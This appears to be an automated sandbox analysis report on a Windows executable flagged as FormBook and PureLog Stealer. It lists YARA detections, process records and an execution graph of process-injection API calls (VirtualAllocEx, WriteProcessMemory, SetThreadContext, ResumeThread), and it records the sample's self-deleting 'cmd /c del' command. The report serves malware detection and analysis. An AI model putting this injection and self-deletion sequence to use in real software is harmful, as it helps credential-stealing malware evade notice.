                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</ti
                                                        Jul 23, 2024 18:32:32.850794077 CEST1236INData Raw: 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20
                                                        Data Ascii: tle><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width
                                                        Jul 23, 2024 18:32:32.850830078 CEST1236INData Raw: 63 65 73 73 22 3e 59 6f 75 20 61 72 65 20 75 6e 61 62 6c 65 20 74 6f 20 61 63 63 65 73 73 3c 2f 73 70 61 6e 3e 20 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72
                                                        Data Ascii: cess">You are unable to access</span> myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full">
                                                        Jul 23, 2024 18:32:32.853863955 CEST1236INData Raw: 67 65 20 63 61 6d 65 20 75 70 20 61 6e 64 20 74 68 65 20 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 20 66 6f 75 6e 64 20 61 74 20 74 68 65 20 62 6f 74 74 6f 6d 20 6f 66 20 74 68 69 73 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                        Data Ascii: ge came up and the Cloudflare Ray ID found at the bottom of this page.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center s
                                                        Jul 23, 2024 18:32:32.853897095 CEST441INData Raw: 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63
                                                        Data Ascii: List"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoa


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:3
                                                        Start time:12:28:03
                                                        Start date:23/07/2024
                                                        Path:C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0xfb0000
                                                        File size:803'328 bytes
                                                        MD5 hash:FAB057E49C317D42F565EF0EFE766557
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:12:28:05
                                                        Start date:23/07/2024
                                                        Path:C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0x4b0000
                                                        File size:803'328 bytes
                                                        MD5 hash:FAB057E49C317D42F565EF0EFE766557
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:12:28:06
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff70ffd0000
                                                        File size:5'141'208 bytes
                                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:14
                                                        Start time:12:28:09
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\SysWOW64\cmmon32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\SysWOW64\cmmon32.exe"
                                                        Imagebase:0x330000
                                                        File size:36'352 bytes
                                                        MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate
                                                        Has exited:false

                                                        General

                                                        Target ID:15
                                                        Start time:12:28:13
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                                                        Imagebase:0x410000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:16
                                                        Start time:12:28:13
                                                        Start date:23/07/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff75da10000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:8.5%
                                                          Dynamic/Decrypted Code Coverage:99%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:310
                                                          Total number of Limit Nodes:15
                                                          execution_graph 47536 650e600 FindCloseChangeNotification 47537 650e667 47536->47537 47392 64e7feb 47393 64e7ff5 47392->47393 47396 64e7ac4 47393->47396 47395 64e803a 47397 64e7acf 47396->47397 47398 64eb273 47397->47398 47401 18f8da8 47397->47401 47408 18f74c4 47397->47408 47398->47395 47402 18f8de3 47401->47402 47404 18f906b 47402->47404 47415 18fb318 47402->47415 47403 18f90a9 47403->47398 47404->47403 47419 18fd3f8 47404->47419 47424 18fd3e8 47404->47424 47409 18f74cf 47408->47409 47411 18f906b 47409->47411 47414 18fb318 2 API calls 47409->47414 47410 18f90a9 47410->47398 47411->47410 47412 18fd3e8 4 API calls 47411->47412 47413 18fd3f8 4 API calls 47411->47413 47412->47410 47413->47410 47414->47411 47429 18fb340 47415->47429 47433 18fb350 47415->47433 47416 18fb32e 47416->47404 47420 18fd419 47419->47420 47421 18fd43d 47420->47421 47456 18fd598 47420->47456 47460 18fd5a8 47420->47460 47421->47403 47425 18fd419 47424->47425 47426 18fd43d 47425->47426 47427 18fd598 4 API calls 47425->47427 47428 18fd5a8 4 API calls 47425->47428 47426->47403 47427->47426 47428->47426 47430 18fb350 47429->47430 47436 18fb43b 47430->47436 47431 18fb35f 47431->47416 47435 18fb43b 2 API calls 47433->47435 47434 18fb35f 47434->47416 47435->47434 47437 18fb459 47436->47437 47438 18fb47c 47436->47438 47437->47438 47444 18fb6d0 47437->47444 47448 18fb6e0 47437->47448 47438->47431 47439 18fb474 47439->47438 47440 18fb680 GetModuleHandleW 47439->47440 47441 18fb6ad 47440->47441 47441->47431 47445 18fb6e0 47444->47445 47447 18fb719 47445->47447 47452 18fa7d0 47445->47452 47447->47439 47449 18fb6f4 47448->47449 47450 18fb719 47449->47450 47451 18fa7d0 LoadLibraryExW 47449->47451 47450->47439 47451->47450 47453 18fb8a0 LoadLibraryExW 47452->47453 47455 18fb919 47453->47455 47455->47447 47457 18fd5b5 47456->47457 47458 18fd5ef 47457->47458 47464 18fc170 47457->47464 47458->47421 47461 18fd5b5 47460->47461 47462 18fd5ef 47461->47462 47463 18fc170 4 API calls 47461->47463 47462->47421 47463->47462 47465 18fc17b 47464->47465 47467 18fe308 47465->47467 47468 18fd794 47465->47468 47467->47467 47469 18fd79f 47468->47469 47470 18f74c4 4 API calls 47469->47470 47471 18fe377 47470->47471 47475 64e01b8 47471->47475 47481 64e01a0 47471->47481 47472 18fe3b1 47472->47467 47476 64e01e9 47475->47476 47478 64e02e9 47475->47478 47477 64e01f5 47476->47477 47487 64e0fff 47476->47487 47492 64e1010 47476->47492 47477->47472 47478->47472 47483 64e02e9 47481->47483 47484 64e01e9 47481->47484 47482 64e01f5 47482->47472 47483->47472 47484->47482 47485 64e0fff 2 API calls 47484->47485 47486 64e1010 2 API calls 47484->47486 47485->47483 47486->47483 47488 64e103b 47487->47488 47489 64e10ea 47488->47489 47497 64e1ee0 47488->47497 47501 64e1dd0 47488->47501 47493 64e103b 47492->47493 47494 64e10ea 47493->47494 47495 64e1ee0 2 API calls 47493->47495 47496 64e1dd0 2 API calls 47493->47496 47495->47494 47496->47494 47500 64e1dd0 2 API calls 47497->47500 47509 64e1f30 47497->47509 47498 64e1f15 47498->47489 47500->47498 47502 64e1ee6 47501->47502 47504 64e1f1e CreateWindowExW 47501->47504 47503 64e1f15 47502->47503 47507 64e1f30 CreateWindowExW 47502->47507 47508 64e1dd0 CreateWindowExW 47502->47508 47503->47489 47506 64e2054 47504->47506 47507->47503 47508->47503 47510 64e1f98 CreateWindowExW 47509->47510 47512 64e2054 47510->47512 47517 18fdac8 47518 18fdb0e 47517->47518 47522 18fdc98 47518->47522 47525 18fdca8 47518->47525 47519 18fdbfb 47528 18fd734 47522->47528 47526 18fdcd6 47525->47526 47527 18fd734 DuplicateHandle 47525->47527 47526->47519 47527->47526 47529 18fdd10 DuplicateHandle 47528->47529 47531 18fdcd6 47529->47531 47531->47519 47553 7cf69a6 47554 7cf690c 47553->47554 47555 7cf6a49 47554->47555 47559 7cf73be 47554->47559 47576 7cf7358 47554->47576 47592 7cf7348 47554->47592 47560 7cf734c 47559->47560 47561 7cf73c1 47559->47561 47608 7cf790f 47560->47608 47612 7cf7e32 47560->47612 47617 7cf78b7 47560->47617 47622 7cf77f7 47560->47622 47626 7cf7c17 47560->47626 47634 7cf7c59 47560->47634 47642 7cf79fa 47560->47642 47647 7cf7f1b 47560->47647 47651 7cf7adc 47560->47651 47656 7cf795d 47560->47656 47661 7cf7b3d 47560->47661 47666 7cf7be9 47560->47666 47671 7cf7769 47560->47671 47561->47554 47562 7cf737a 47562->47554 47577 7cf7372 47576->47577 47579 7cf790f 2 API calls 47577->47579 47580 7cf7769 2 API calls 47577->47580 47581 7cf7be9 2 API calls 47577->47581 47582 7cf7b3d 2 API calls 47577->47582 47583 7cf795d 2 API calls 47577->47583 47584 7cf7adc 2 API calls 47577->47584 47585 7cf7f1b 2 API calls 47577->47585 47586 7cf79fa 2 API calls 47577->47586 47587 7cf7c59 4 API calls 47577->47587 47588 7cf7c17 4 API calls 47577->47588 47589 7cf77f7 2 API calls 47577->47589 47590 7cf78b7 2 API calls 47577->47590 47591 7cf7e32 2 API calls 47577->47591 47578 7cf737a 47578->47554 47579->47578 47580->47578 47581->47578 47582->47578 47583->47578 47584->47578 47585->47578 47586->47578 47587->47578 47588->47578 47589->47578 47590->47578 47591->47578 47593 7cf734c 47592->47593 47595 7cf790f 2 API calls 47593->47595 47596 7cf7769 2 API calls 47593->47596 47597 7cf7be9 2 API calls 47593->47597 47598 7cf7b3d 2 API calls 47593->47598 47599 7cf795d 2 API calls 47593->47599 47600 7cf7adc 2 API calls 47593->47600 47601 7cf7f1b 2 API calls 47593->47601 47602 7cf79fa 2 API calls 47593->47602 47603 7cf7c59 4 API calls 47593->47603 47604 7cf7c17 4 API calls 47593->47604 47605 7cf77f7 2 API calls 47593->47605 47606 7cf78b7 2 API calls 47593->47606 47607 7cf7e32 2 API calls 47593->47607 47594 7cf737a 47594->47554 47595->47594 47596->47594 47597->47594 47598->47594 47599->47594 47600->47594 47601->47594 47602->47594 47603->47594 47604->47594 47605->47594 47606->47594 47607->47594 47675 7cf6268 47608->47675 47679 7cf6261 47608->47679 47609 7cf77c4 47609->47562 47614 7cf7a14 47612->47614 47613 7cf819e 47613->47562 47614->47613 47615 7cf6268 WriteProcessMemory 47614->47615 47616 7cf6261 WriteProcessMemory 47614->47616 47615->47614 47616->47614 47618 7cf78bd 47617->47618 47619 7cf77c4 47618->47619 47620 7cf6268 WriteProcessMemory 47618->47620 47621 7cf6261 WriteProcessMemory 47618->47621 47619->47562 47620->47619 47621->47619 47623 7cf7812 47622->47623 47683 7cf5be8 47623->47683 47687 7cf5be0 47623->47687 47627 7cf7c60 47626->47627 47628 7cf7812 47627->47628 47629 7cf77c4 47627->47629 47691 7cf84b1 47627->47691 47696 7cf84c0 47627->47696 47632 7cf5be8 ResumeThread 47628->47632 47633 7cf5be0 ResumeThread 47628->47633 47629->47562 47632->47628 47633->47628 47635 7cf7c5f 47634->47635 47636 7cf7812 47635->47636 47637 7cf77c4 47635->47637 47638 7cf84b1 2 API calls 47635->47638 47639 7cf84c0 2 API calls 47635->47639 47640 7cf5be8 ResumeThread 47636->47640 47641 7cf5be0 ResumeThread 47636->47641 47637->47562 47638->47636 47639->47636 47640->47636 47641->47636 47643 7cf7a14 47642->47643 47644 7cf819e 47643->47644 47645 7cf6268 WriteProcessMemory 47643->47645 47646 7cf6261 WriteProcessMemory 47643->47646 47644->47562 47645->47643 47646->47643 47709 7cf61a8 47647->47709 47713 7cf61a1 47647->47713 47648 7cf7f41 47652 7cf7ae2 47651->47652 47717 7cf6358 47652->47717 47721 7cf6351 47652->47721 47653 7cf7f78 47653->47653 47657 7cf7977 47656->47657 47657->47562 47659 7cf6358 ReadProcessMemory 47657->47659 47660 7cf6351 ReadProcessMemory 47657->47660 47658 7cf7f78 47659->47658 47660->47658 47662 7cf7b43 47661->47662 47664 7cf6358 ReadProcessMemory 47662->47664 47665 7cf6351 ReadProcessMemory 47662->47665 47663 7cf7f78 47664->47663 47665->47663 47667 7cf7e48 47666->47667 47669 7cf5c98 Wow64SetThreadContext 47667->47669 47670 7cf5c90 Wow64SetThreadContext 47667->47670 47668 7cf7e63 47669->47668 47670->47668 47725 7cf64e4 47671->47725 47729 7cf64f0 47671->47729 47676 7cf62b0 WriteProcessMemory 47675->47676 47678 7cf6307 47676->47678 47678->47609 47680 7cf6268 WriteProcessMemory 47679->47680 47682 7cf6307 47680->47682 47682->47609 47684 7cf5c28 ResumeThread 47683->47684 47686 7cf5c59 47684->47686 47686->47623 47688 7cf5be8 ResumeThread 47687->47688 47690 7cf5c59 47688->47690 47690->47623 47692 7cf84c0 47691->47692 47701 7cf5c98 47692->47701 47705 7cf5c90 47692->47705 47693 7cf84eb 47693->47628 47697 7cf84d5 47696->47697 47699 7cf5c98 Wow64SetThreadContext 47697->47699 47700 7cf5c90 Wow64SetThreadContext 47697->47700 47698 7cf84eb 47698->47628 47699->47698 47700->47698 47702 7cf5cdd Wow64SetThreadContext 47701->47702 47704 7cf5d25 47702->47704 47704->47693 47706 7cf5c98 Wow64SetThreadContext 47705->47706 47708 7cf5d25 47706->47708 47708->47693 47710 7cf61e8 VirtualAllocEx 47709->47710 47712 7cf6225 47710->47712 47712->47648 47714 7cf61a8 VirtualAllocEx 47713->47714 47716 7cf6225 47714->47716 47716->47648 47718 7cf63a3 ReadProcessMemory 47717->47718 47720 7cf63e7 47718->47720 47720->47653 47722 7cf6358 ReadProcessMemory 47721->47722 47724 7cf63e7 47722->47724 47724->47653 47726 7cf64f0 CreateProcessA 47725->47726 47728 7cf673b 47726->47728 47728->47728 47730 7cf6579 CreateProcessA 47729->47730 47732 7cf673b 47730->47732 47732->47732 47538 64e7e95 47539 64e7e9f 47538->47539 47540 64e7ac4 4 API calls 47539->47540 47541 64e7ea8 47540->47541 47542 64e7ac4 4 API calls 47541->47542 47543 64e7ec6 47542->47543 47544 64e7ac4 4 API calls 47543->47544 47545 64e7ee4 47544->47545 47733 158d1b4 47734 158d1cc 47733->47734 47735 158d226 47734->47735 47740 64e20e8 47734->47740 47745 64e20d7 47734->47745 47750 64e2e38 47734->47750 47755 64e2e48 47734->47755 47741 64e210e 47740->47741 47743 64e2e48 2 API calls 47741->47743 47744 64e2e38 2 API calls 47741->47744 47742 64e212f 47742->47735 47743->47742 47744->47742 47746 64e20e5 47745->47746 47748 64e2e48 2 API calls 47746->47748 47749 64e2e38 2 API calls 47746->47749 47747 64e212f 47747->47735 47748->47747 47749->47747 47751 64e2e75 47750->47751 47752 64e2ea7 47751->47752 47760 64e2fc0 47751->47760 47765 64e2fd0 47751->47765 47757 64e2e75 47755->47757 47756 64e2ea7 47757->47756 47758 64e2fc0 2 API calls 47757->47758 47759 64e2fd0 2 API calls 47757->47759 47758->47756 47759->47756 47762 64e2fe4 47760->47762 47761 64e3070 47761->47752 47770 64e3088 47762->47770 47773 64e3079 47762->47773 47767 64e2fe4 47765->47767 47766 64e3070 47766->47752 47768 64e3088 2 API calls 47767->47768 47769 64e3079 2 API calls 47767->47769 47768->47766 47769->47766 47771 64e3099 47770->47771 47776 64e4641 47770->47776 47771->47761 47774 64e3099 47773->47774 47775 64e4641 2 API calls 47773->47775 47774->47761 47775->47774 47780 64e4660 47776->47780 47784 64e4670 47776->47784 47777 64e465a 47777->47771 47781 64e46b2 47780->47781 47783 64e46b9 47780->47783 47782 64e470a CallWindowProcW 47781->47782 47781->47783 47782->47783 47783->47777 47785 64e46b2 47784->47785 47787 64e46b9 47784->47787 47786 64e470a CallWindowProcW 47785->47786 47785->47787 47786->47787 47787->47777 47513 64e7de0 47515 64e7e17 47513->47515 47514 64e7e1c 47514->47514 47515->47514 47516 64e7ac4 4 API calls 47515->47516 47516->47515 47532 64ec100 47533 64ec122 47532->47533 47534 18f8da8 4 API calls 47532->47534 47535 18f74c4 4 API calls 47532->47535 47534->47533 47535->47533 47546 7cf8a90 47547 7cf8c1b 47546->47547 47549 7cf8ab6 47546->47549 47549->47547 47550 7cf867c 47549->47550 47551 7cf8d10 PostMessageW 47550->47551 47552 7cf8d7c 47551->47552 47552->47549

                                                          Executed Functions

                                                          Function 07C93B58 Relevance: .7, Instructions: 739COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1306713025.0000000007C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7c90000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 94a819ca0009ce2b239b5d52b0b34b36870f9c5761ab272932a4da4ba6cbb2c3
                                                          • Instruction ID: d34b94405943f9f7a88b1077ffe66d6a59e256b88c47264d7a343e133605fe99
                                                          • Opcode Fuzzy Hash: 94a819ca0009ce2b239b5d52b0b34b36870f9c5761ab272932a4da4ba6cbb2c3
                                                          • Instruction Fuzzy Hash: A1623A75A00618DFDB59CF68C988F99BBB2FF48300F1581A8E509AB261DB31ED52CF40
                                                          Function 07CF9A88 Relevance: .6, Instructions: 608COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1307042569.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7cf0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e1d03492c2de7a0b8c44dca782322b5b58a9dac07222a7b52f3717ded824c9fd
                                                          • Instruction ID: ce0306f76acc5465451b41cf86cd37f57e9d0c54950221f21cddf0490e7f5fcd
                                                          • Opcode Fuzzy Hash: e1d03492c2de7a0b8c44dca782322b5b58a9dac07222a7b52f3717ded824c9fd
                                                          • Instruction Fuzzy Hash: 89329FB1B012058FDB59DF69C590BAEB7F6AF89700F148469E60ADB390CB35EE01CB51
                                                          Function 064E0690 Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f0bf540b4de54b3930ea5ea8015e876021e89c99d8b8d82de5716595783d0fe8
                                                          • Instruction ID: e9af64c294d7ac2fd4b99636757db551973ba65b3f225c115872034a6ec23585
                                                          • Opcode Fuzzy Hash: f0bf540b4de54b3930ea5ea8015e876021e89c99d8b8d82de5716595783d0fe8
                                                          • Instruction Fuzzy Hash: 831275B18017468BE710EF65F94C289BBB1FB46328F70C609D2616F2E9DBB8154ACF44
                                                          Function 064E0680 Relevance: .2, Instructions: 219COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1301270727.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_64e0000_xU0wdBC6XWRZ6UY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0eec9c70ac7b20a5c915b88a9ca4a2d284171d27c683c69c3fd800ec5d5679f9
                                                          • Instruction ID: af5ed0368b60791b6cbef4d08c3673185c9f0a250c98899a3fe40f60deedca55
                                                          • Opcode Fuzzy Hash: 0eec9c70ac7b20a5c915b88a9ca4a2d284171d27c683c69c3fd800ec5d5679f9
                                                          • Instruction Fuzzy Hash: B1C1E7B18017468BE714EF65F94C289BBB1FB86324F718709D2616F2E8DBB8154ACF44
                                                          Function 064E1DD0 Relevance: 1.8, APIs: 1, Instructions: 282COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
